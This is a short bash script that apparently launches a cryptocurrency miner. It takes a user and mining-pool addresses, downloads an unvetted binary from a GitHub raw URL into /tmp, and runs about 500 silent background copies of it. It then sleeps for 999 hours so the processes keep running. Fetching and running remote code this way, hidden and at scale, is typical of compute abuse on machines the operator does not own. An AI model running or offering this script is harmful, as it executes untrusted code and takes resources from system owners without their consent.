#!/bin/bash

if [[ "$1" ]]; then
  user="$1"
else
  exit 1
fi

if [[ "$2" ]]; then
  pool_url_1="$2"
else
  exit 1
fi

if [[ "$3" ]]; then
  pool_port_1="$3"
else
  exit 1
fi

if [[ "$4" ]]; then
  pool_url_2="$4"
else
  pool_url_2="127.0.0.1"
fi

if [[ "$5" ]]; then
  pool_port_2="$5"
else
  pool_port_2="1000"
fi

if [[ "$6" ]]; then
  pool_url_3="$6"
else
  pool_url_3="127.0.0.1"
fi

if [[ "$7" ]]; then
  pool_port_3="$7"
else
  pool_port_3="1000"
fi

wget -O /tmp/start https://raw.githubusercontent.com/walters99/Slurb/main/start

chmod +x /tmp/start

for i in {1..500} :
do
  /tmp/start $user $pool_url_1 $pool_port_1 $pool_url_2 $pool_port_2 $pool_url_3 $pool_port_3 >/dev/null &
done
sleep 999h
